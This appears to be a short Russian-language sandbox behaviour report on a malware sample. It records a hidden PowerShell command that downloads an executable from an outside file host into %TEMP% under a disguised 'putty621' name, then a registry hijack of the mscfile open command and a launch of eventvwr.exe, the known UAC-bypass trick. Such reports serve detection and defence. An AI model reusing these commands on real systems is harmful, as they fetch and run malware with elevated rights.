Техническая информация
- [HKCU\Software\Classes\mscfile\shell\open\command] '' = '%TEMP%\putty621.exe'
- https://a.pomf.cat/bgqaaa.exe как %temp%\putty621.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://a.pomf.cat/bgqaaa.exe','%TEMP%\putty621.exe') & reg add HKCU\Software\Classes\mscfile\shell\o...
- 'a.##mf.cat':443
- 'a.##mf.cat':443
- DNS ASK a.##mf.cat
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://a.pomf.cat/bgqaaa.exe','%TEMP%\putty621.exe') & reg add HKCU\Software\Classes\mscfile\shell\o...' (со скрытым окном)
- '<SYSTEM32>\reg.exe' add HKCU\Software\Classes\mscfile\shell\open\command /d %TEMP%\putty621.exe /f
- '<SYSTEM32>\eventvwr.exe'